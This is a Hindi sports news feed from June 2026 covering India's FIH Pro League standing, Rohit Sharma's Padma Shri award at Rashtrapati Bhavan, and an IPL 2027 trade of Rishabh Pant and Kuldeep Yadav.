भारत अब एफआईएच प्रो लीग के मौजूदा सीजन में 13 मैचों में तीन जीत के साथ 7वें स्थान पर आ चुका है. दूसरी ओर पाकिस्तान अंक तालिका में सबसे नीचे है क्योंकि वह अपने सभी 13 मैच हार चुका है. लंदन लेग में भारत को पाकिस्तान के खिलाफ एक और मुकाबला खेलना है. साथ ही उसके दो मैच इंग्लैंड के खिलाफ होने हैं। 

]]>
टीम इंडिया के कप्तान रोहित शर्मा को पद्मश्री, राष्ट्रपति भवन में हुआ सम्मान https://pratyushaashakinayikiran.com/?p=229083 Wed, 24 Jun 2026 06:57:00 +0000 https://pratyushaashakinayikiran.com/?p=229083   नई दिल्ली

भारतीय क्रिकेट टीम के कप्तान रह चुके रोहित शर्मा को मंगलवार (23 जून) को पद्मश्री से सम्मानित किया गया. राष्ट्रपति द्रौपदी मुर्मू ने राष्ट्रपति भवन में आयोजित समारोह में उन्हें यह प्रतिष्ठित सम्मान प्रदान किया। 

रोहित शर्मा का नाम जनवरी 2026 में घोषित पद्म पुरस्कार विजेताओं की सूची में शामिल किया गया था. खेल जगत में उनके असाधारण योगदान, भारतीय क्रिकेट को नई ऊंचाइयों तक पहुंचाने और बतौर बल्लेबाज शानदार उपलब्धियों के लिए उन्हें इस सम्मान से नवाजा गया। 

राष्ट्रपति भवन में आयोजित इस समारोह में कुल 65 हस्तियों को पद्म पुरस्कार दिए गए, जिनमें 2 पद्म विभूषण, 7 पद्म भूषण और 56 पद्मश्री सम्मान शामिल रहे. इससे पहले 25 मई को भी पद्म पुरस्कारों के लिए सम्मान समारोह आयोजित हुआ था, जिसमें राष्ट्रपति ने 66 हस्तियों को सम्मानित किया था। 

रोहित शर्मा के अलावा विजय अमृतराज, अलका याज्ञनिक और ममूटी जैसी कई नामी हस्तियां भी सम्मानित की गईं. रोहित शर्मा भारतीय क्रिकेट इतिहास के सबसे सफल खिलाड़ियों में शुमार हैं. उनकी कप्तानी में टीम इंडिया ने कई बड़ी उपलब्धियां हासिल कीं और उन्होंने अंतरराष्ट्रीय क्रिकेट में कई रिकॉर्ड भी अपने नाम किए हैं। 

]]>
PL 2027 Trade: ऋषभ पंत दिल्ली कैपिटल्स में लौटे, कुलदीप यादव पहुंचे LSG https://pratyushaashakinayikiran.com/?p=228875 Tue, 23 Jun 2026 10:05:00 +0000 https://pratyushaashakinayikiran.com/?p=228875 नई दिल्ली
आईपीएल 2027 से पहले ऋषभ पंत और कुलदीप यादव की टीमें बदल चुकी है। दिल्ली कैपिटल्स और लखनऊ सुपर जाएंटस के बीच सबसे बड़ा ट्रेड हो चुका है। लंबे समय से इसकी खबरें क्रिकेट के गलियारों में टहल रही थी। आज यानि 23 जून को आईपीएल की ओर से इस पर आधिकारिक मुहर लगा दी गई है। पंत दिल्ली में 15 करोड़ में वापसी करेंगे तो वहीं कुलदीप को एलएसजी ने 13.5 करोड़ की कीमत पर साइन किया है।

ऋषभ पंत और कुलदीप यादव की अदला-बदली
2 साल लखनऊ सुपर जाएंट्स का हिस्सा रहने के बाद ऋषभ पंत की एक बार फिर अपनी पुरानी टीम दिल्ली कैपिटल्स में वापसी हो चुकी है। डीसी के साथ उन्होंने 2016 में अपने करियर की शुरुआत की थी। तो वहीं साल 2022 से दिल्ली के लिए खेल रहे कुलदीप यादव लखनऊ के लिए खेलेंगे। आईपीएल 2027 से पहले यह लीग की सबसे बड़ी ट्रेड डील मानी जा सकती है। क्योंकि दोनों ही खिलाड़ी आईपीएल के साथ ही भारतीय क्रिकेट के भी स्टार खिलाड़ियों में से एक हैं।

]]>